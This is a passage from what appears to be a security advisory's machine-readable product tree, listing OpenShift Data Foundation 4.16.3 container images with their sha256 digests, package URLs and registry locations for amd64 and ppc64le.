"odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87?arch=amd64&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product: { name: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_id: "odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product: { name: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_id: "odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product: { name: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_id: "odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product: { name: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_id: "odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product: { name: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_id: "odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c?arch=amd64&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product: { name: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_id: "odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product: { name: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_id: "odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5?arch=amd64&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe?arch=amd64&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_id: "odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_id: "odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product: { name: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_id: "odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3?arch=amd64&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product: { name: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_id: "odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6?arch=amd64&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product: { name: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_id: "odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd?arch=amd64&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_id: "odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a?arch=amd64&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_id: "odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d?arch=amd64&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product: { name: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_id: "odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996?arch=amd64&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product: { name: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_id: "odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26?arch=amd64&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product: { name: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_id: "odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388?arch=amd64&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product: { name: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_id: "odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_id: "odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20?arch=amd64&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.16.3-1", }, }, }, ], category: "architecture", name: "amd64", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.16.3-2", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.16.3-1", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", product_identification_helper: { purl: 